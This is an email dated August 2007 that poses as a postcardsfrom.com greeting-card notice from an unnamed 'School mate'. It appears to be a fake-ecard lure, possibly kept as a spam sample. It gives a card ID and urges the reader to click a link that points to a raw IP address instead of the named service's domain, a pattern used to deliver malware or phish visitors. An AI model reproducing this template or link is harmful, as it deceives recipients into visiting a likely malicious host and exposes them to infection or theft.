Subject: School mate sent you an ecard from postcardsfrom.com!

From: "postcardsfrom.com" <[email-masked]>
Date: Fri, 10 Aug 2007 20:28:18 -0400

School mate has created a greeting ecard for you at postcardsfrom.com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 706c2e194e15456ec290b516c3c2cd8a7c0b58 

To see your custom greeting card, simply click on the link below: 
http://74.72.126.14/?706c2e194e15456ec290b516c3c2cd8a7c0b58

Send greeting cards from postcardsfrom.com whenever you want by visiting us at: 
http://postcardsfrom.com/
Copyright (c) 1996-2007 postcardsfrom.com All Rights Reserved